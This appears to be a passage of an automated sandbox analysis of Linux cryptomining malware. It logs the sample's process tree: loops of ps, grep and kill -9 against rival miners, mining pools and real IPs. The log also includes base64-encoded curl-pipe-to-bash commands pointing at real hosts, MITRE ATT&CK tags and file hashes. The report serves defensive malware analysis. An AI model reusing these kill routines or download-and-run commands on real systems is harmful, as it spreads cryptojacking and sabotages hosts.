  2⤵
  PID:2244
- /bin/ps
  ps aux
  2⤵
  PID:2243
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2252
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2251
- /bin/grep
  grep kthrotlds
  2⤵
  PID:2250
- /bin/grep
  grep -v grep
  2⤵
  PID:2249
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2248
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2257
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2256
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:2255
- /bin/grep
  grep -v grep
  2⤵
  PID:2254
- /bin/ps
  ps aux
  2⤵
  PID:2253
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2262
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2261
- /bin/grep
  grep netdns
  2⤵
  PID:2260
- /bin/grep
  grep -v grep
  2⤵
  PID:2259
- /bin/ps
  ps aux
  2⤵
  PID:2258
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2267
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2266
- /bin/grep
  grep watchdogs
  2⤵
  PID:2265
- /bin/grep
  grep -v grep
  2⤵
  PID:2264
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2263
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2278
- /bin/grep
  grep -v atd
  2⤵
  PID:2275
- /bin/grep
  grep -v apache2
  2⤵
  PID:2274
- /usr/bin/awk
  awk "\$3>80.0{print \$2}"
  2⤵
  PID:2277
- /bin/grep
  grep -v kdevtmpfsi
  2⤵
  PID:2276
- /bin/grep
  grep -v dblaunched
  2⤵
  PID:2273
- /bin/grep
  grep -v dblaunchs
  2⤵
  PID:2272
- /bin/grep
  grep -v dblaunch
  2⤵
  PID:2271
- /bin/grep
  grep -v root
  2⤵
  PID:2270
- /bin/grep
  grep -v grep
  2⤵
  PID:2269
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2268
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2284
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2283
- /bin/grep
  grep " ps"
  2⤵
  PID:2282
- /bin/grep
  grep -v aux
  2⤵
  PID:2281
- /bin/grep
  grep -v grep
  2⤵
  PID:2280
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2279
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2289
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2288
- /bin/grep
  grep sync_supers
  2⤵
  PID:2287
- /bin/grep
  grep -v grep
  2⤵
  PID:2286
- /bin/ps
  ps aux
  2⤵
  PID:2285
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2293
- /bin/grep
  grep cpuset
  2⤵
  PID:2292
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2294
- /bin/grep
  grep -v grep
  2⤵
  PID:2291
- /bin/ps
  ps aux
  2⤵
  PID:2290
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2300
- /bin/grep
  grep "x]"
  2⤵
  PID:2298
- /bin/grep
  grep -v aux
  2⤵
  PID:2297
- /bin/grep
  grep -v grep
  2⤵
  PID:2296
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2299
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2295
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2306
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2305
- /bin/grep
  grep "sh] <"
  2⤵
  PID:2304
- /bin/grep
  grep -v aux
  2⤵
  PID:2303
- /bin/grep
  grep -v grep
  2⤵
  PID:2302
- /bin/ps
  ps aux
  2⤵
  PID:2301
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2312
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2311
- /bin/grep
  grep " \\[]"
  2⤵
  PID:2310
- /bin/grep
  grep -v aux
  2⤵
  PID:2309
- /bin/grep
  grep -v grep
  2⤵
  PID:2308
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2307
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2317
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2316
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:2315
- /bin/grep
  grep -v grep
  2⤵
  PID:2314
- /bin/ps
  ps aux
  2⤵
  PID:2313
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2322
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2321
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:2320
- /bin/grep
  grep -v grep
  2⤵
  PID:2319
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2318
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2327
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2326
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2325
- /bin/grep
  grep -v grep
  2⤵
  PID:2324
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2323
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2332
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2331
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:2330
- /bin/grep
  grep -v grep
  2⤵
  PID:2329
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2328
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2337
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2336
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:2335
- /bin/grep
  grep -v grep
  2⤵
  PID:2334
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2333
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2342
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2341
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:2340
- /bin/grep
  grep -v grep
  2⤵
  PID:2339
- /bin/ps
  ps aux
  2⤵
  PID:2338
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2347
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2346
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:2345
- /bin/grep
  grep -v grep
  2⤵
  PID:2344
- /bin/ps
  ps aux
  2⤵
  PID:2343
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2352
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2351
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:2350
- /bin/grep
  grep -v grep
  2⤵
  PID:2349
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2348
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2357
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2356
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:2355
- /bin/grep
  grep -v grep
  2⤵
  PID:2354
- /bin/ps
  ps aux
  2⤵
  PID:2353
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2362
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2361
- /bin/grep
  grep sustse
  2⤵
  PID:2360
- /bin/grep
  grep -v grep
  2⤵
  PID:2359
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2358
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2367
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2366
- /bin/grep
  grep sustse3
  2⤵
  PID:2365
- /bin/grep
  grep -v grep
  2⤵
  PID:2364
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2363
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2373
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2372
- /bin/grep
  grep wget
  2⤵
  PID:2371
- /bin/grep
  grep mr.sh
  2⤵
  PID:2370
- /bin/grep
  grep -v grep
  2⤵
  PID:2369
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2368
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2379
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2378
- /bin/grep
  grep curl
  2⤵
  PID:2377
- /bin/grep
  grep mr.sh
  2⤵
  PID:2376
- /bin/grep
  grep -v grep
  2⤵
  PID:2375
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2374
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2385
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2384
- /bin/grep
  grep wget
  2⤵
  PID:2383
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2382
- /bin/grep
  grep -v grep
  2⤵
  PID:2381
- /bin/ps
  ps aux
  2⤵
  PID:2380
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2391
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2390
- /bin/grep
  grep curl
  2⤵
  PID:2389
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2388
- /bin/grep
  grep -v grep
  2⤵
  PID:2387
- /bin/ps
  ps aux
  2⤵
  PID:2386
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2397
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2396
- /bin/grep
  grep wget
  2⤵
  PID:2395
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2394
- /bin/grep
  grep -v grep
  2⤵
  PID:2393
- /bin/ps
  ps aux
  2⤵
  PID:2392
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2403
- /bin/grep
  grep curl
  2⤵
  PID:2401
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2402
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2400
- /bin/grep
  grep -v grep
  2⤵
  PID:2399
- /bin/ps
  ps aux
  2⤵
  PID:2398
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2409
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2408
- /bin/grep
  grep wget
  2⤵
  PID:2407
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2406
- /bin/grep
  grep -v grep
  2⤵
  PID:2405
- /bin/ps
  ps aux
  2⤵
  PID:2404
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2415
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2414
- /bin/grep
  grep curl
  2⤵
  PID:2413
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2412
- /bin/grep
  grep -v grep
  2⤵
  PID:2411
- /bin/ps
  ps aux
  2⤵
  PID:2410
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2420
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2419
- /bin/grep
  grep j2.conf
  2⤵
  PID:2418
- /bin/grep
  grep -v grep
  2⤵
  PID:2417
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2416
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2426
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2425
- /bin/grep
  grep wget
  2⤵
  PID:2424
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2423
- /bin/grep
  grep -v grep
  2⤵
  PID:2422
- /bin/ps
  ps aux
  2⤵
  PID:2421
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2432
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2431
- /bin/grep
  grep curl
  2⤵
  PID:2430
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2429
- /bin/grep
  grep -v grep
  2⤵
  PID:2428
- /bin/ps
  ps aux
  2⤵
  PID:2427
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2438
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2437
- /bin/grep
  grep wget
  2⤵
  PID:2436
- /bin/grep
  grep ficov
  2⤵
  PID:2435
- /bin/grep
  grep -v grep
  2⤵
  PID:2434
- /bin/ps
  ps aux
  2⤵
  PID:2433
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2444
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2443
- /bin/grep
  grep ficov
  2⤵
  PID:2441
- /bin/grep
  grep -v grep
  2⤵
  PID:2440
- /bin/grep
  grep curl
  2⤵
  PID:2442
- /bin/ps
  ps aux
  2⤵
  PID:2439
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2450
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2449
- /bin/grep
  grep wget
  2⤵
  PID:2448
- /bin/grep
  grep he.sh
  2⤵
  PID:2447
- /bin/grep
  grep -v grep
  2⤵
  PID:2446
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2445
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2456
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2455
- /bin/grep
  grep curl
  2⤵
  PID:2454
- /bin/grep
  grep he.sh
  2⤵
  PID:2453
- /bin/grep
  grep -v grep
  2⤵
  PID:2452
- /bin/ps
  ps aux
  2⤵
  PID:2451
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2462
- /bin/grep
  grep wget
  2⤵
  PID:2460
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2461
- /bin/grep
  grep miner.sh
  2⤵
  PID:2459
- /bin/ps
  ps aux
  2⤵
  PID:2457
- /bin/grep
  grep -v grep
  2⤵
  PID:2458
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2468
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2467
- /bin/grep
  grep curl
  2⤵
  PID:2466
- /bin/grep
  grep miner.sh
  2⤵
  PID:2465
- /bin/grep
  grep -v grep
  2⤵
  PID:2464
- /bin/ps
  ps aux
  2⤵
  PID:2463
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2474
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2473
- /bin/grep
  grep wget
  2⤵
  PID:2472
- /bin/grep
  grep nullcrew
  2⤵
  PID:2471
- /bin/grep
  grep -v grep
  2⤵
  PID:2470
- /bin/ps
  ps aux
  2⤵
  PID:2469
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2480
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2479
- /bin/grep
  grep curl
  2⤵
  PID:2478
- /bin/grep
  grep nullcrew
  2⤵
  PID:2477
- /bin/grep
  grep -v grep
  2⤵
  PID:2476
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2475
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2485
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2484
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:2483
- /bin/grep
  grep -v grep
  2⤵
  PID:2482
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2481
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2490
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2489
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:2488
- /bin/grep
  grep -v grep
  2⤵
  PID:2487
- /bin/ps
  ps aux
  2⤵
  PID:2486
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2495
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:2493
- /bin/grep
  grep -v grep
  2⤵
  PID:2492
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2494
- /bin/ps
  ps aux
  2⤵
  PID:2491
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2500
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2499
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:2498
- /bin/grep
  grep -v grep
  2⤵
  PID:2497
- /bin/ps
  ps aux
  2⤵
  PID:2496
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2505
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2504
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:2503
- /bin/grep
  grep -v grep
  2⤵
  PID:2502
- /bin/ps
  ps aux
  2⤵
  PID:2501
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2510
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2509
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2508
- /bin/grep
  grep -v grep
  2⤵
  PID:2507
- /bin/ps
  ps aux
  2⤵
  PID:2506
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2515
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2514
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:2513
- /bin/grep
  grep -v grep
  2⤵
  PID:2512
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2511
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2520
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2519
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:2518
- /bin/grep
  grep -v grep
  2⤵
  PID:2517
- /bin/ps
  ps auxf
  2⤵
  PID:2516
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2525
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2524
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  PID:2523
- /bin/grep
  grep -v grep
  2⤵
  PID:2522
- /bin/ps
  ps auxf
  2⤵
  PID:2521
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2530
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2529
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:2528
- /bin/grep
  grep -v grep
  2⤵
  PID:2527
- /bin/ps
  ps auxf
  2⤵
  PID:2526
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2535
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2534
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:2533
- /bin/grep
  grep -v grep
  2⤵
  PID:2532
- /bin/ps
  ps auxf
  2⤵
  PID:2531
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2540
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2539
- /bin/grep
  grep monerohash.com
  2⤵
  PID:2538
- /bin/grep
  grep -v grep
  2⤵
  PID:2537
- /bin/ps
  ps auxf
  2⤵
  PID:2536
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2545
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2544
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  PID:2543
- /bin/grep
  grep -v grep
  2⤵
  PID:2542
- /bin/ps
  ps auxf
  2⤵
  PID:2541
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2550
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2549
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:2548
- /bin/grep
  grep -v grep
  2⤵
  PID:2547
- /bin/ps
  ps auxf
  2⤵
  PID:2546
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2555
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2554
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:2553
- /bin/grep
  grep -v grep
  2⤵
  PID:2552
- /bin/ps
  ps auxf
  2⤵
  PID:2551
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2560
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2559
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:2558
- /bin/grep
  grep -v grep
  2⤵
  PID:2557
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2556
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2565
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2564
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:2563
- /bin/grep
  grep -v grep
  2⤵
  PID:2562
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2561
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2570
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2569
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:2568
- /bin/grep
  grep -v grep
  2⤵
  PID:2567
- /bin/ps
  ps auxf
  2⤵
  PID:2566
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2574
- - /usr/local/sbin/kill
    kill -9 2572
    3⤵
    PID:2575
- - /usr/local/bin/kill
    kill -9 2572
    3⤵
    PID:2575
- - /usr/sbin/kill
    kill -9 2572
    3⤵
    PID:2575
- - /usr/bin/kill
    kill -9 2572
    3⤵
    PID:2575
- - /sbin/kill
    kill -9 2572
    3⤵
    PID:2575
- - /bin/kill
    kill -9 2572
    3⤵
    - Reads CPU attributes
    PID:2575
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2573
- /bin/grep
  grep xiaoyao
  2⤵
  PID:2572
- /bin/ps
  ps auxf
  2⤵
  PID:2571
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2579
- - /usr/local/sbin/kill
    kill -9 2577
    3⤵
    PID:2580
- - /usr/local/bin/kill
    kill -9 2577
    3⤵
    PID:2580
- - /usr/sbin/kill
    kill -9 2577
    3⤵
    PID:2580
- - /usr/bin/kill
    kill -9 2577
    3⤵
    PID:2580
- - /sbin/kill
    kill -9 2577
    3⤵
    PID:2580
- - /bin/kill
    kill -9 2577
    3⤵
    PID:2580
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2578
- /bin/grep
  grep xiaoxue
  2⤵
  PID:2577
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2576
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2586
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2585
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2584
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2583
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:2582
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2592
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2591
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2590
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2589
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2588
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2598
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2597
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2596
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2595
- /bin/grep
  grep 108.174.197.76
  2⤵
  PID:2594
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2604
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2603
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2602
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2601
- /bin/grep
  grep 192.236.161.6
  2⤵
  PID:2600
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2610
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2609
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2608
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2607
- /bin/grep
  grep 88.99.242.92
  2⤵
  PID:2606
- /usr/bin/pkill
  pkill -f pastebin
  2⤵
  PID:2611
- /usr/bin/pkill
  pkill -f 185.193.127.115
  2⤵
  - Reads CPU attributes
  PID:2612
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2614
- /usr/bin/pgrep
  pgrep -f monerohash
  2⤵
  PID:2613
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2616
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  PID:2615
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2618
- /usr/bin/pgrep
  pgrep -f xzpauectgr
  2⤵
  - Reads runtime system information
  PID:2617
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2620
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  PID:2619
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2622
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  PID:2621
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2624
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  PID:2623
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2626
- /usr/bin/pgrep
  pgrep -f 200.68.17.196
  2⤵
  - Reads CPU attributes
  PID:2625
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/.wget-hsts

Filesize
168B

MD5
bd4dd32b775f86fd15cd863a4d77d1a1

SHA1
6944dbad88184ac6e60ab2efb9f49000b348aa02

SHA256
4c1ae556ed8f79beadcacac1ed32b79d3ef75889b24837901d5b20cfdcf06d6c

SHA512
c57d29a72b484db41fb3d0f97e34c69431b9bd01cbe115c0de9e81fadf2956ca9245790abdc69fc44154113ad298f915e2c75b1a5a2d8f184b6caf4d24895244

Download Submit
/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads